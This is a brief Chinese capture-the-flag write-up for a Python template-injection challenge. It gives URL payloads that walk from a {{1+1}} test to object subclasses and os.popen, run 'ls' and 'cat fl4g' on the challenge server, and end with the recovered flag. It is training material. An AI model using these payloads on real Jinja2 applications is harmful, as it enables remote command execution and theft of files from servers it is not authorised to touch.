点开题目所给链接:我们通过 {{1+1}} 判断了它存在phthon模块注入:通过 http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()%7D%7D访问所有模块。
我们可以借用 os.popen来读取我们想要的flag文件里的信息
构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘os’].popen(‘ls’).read()%7D%7D可发现我们要的flag就在fl4g里,我们查看这个文件即可,构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘os’].popen(‘cat%20fl4g’).read()%7D%7D得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
攻防世界web进阶区之Web_python_template_injection
最新推荐文章于 2022-06-17 11:29:58 发布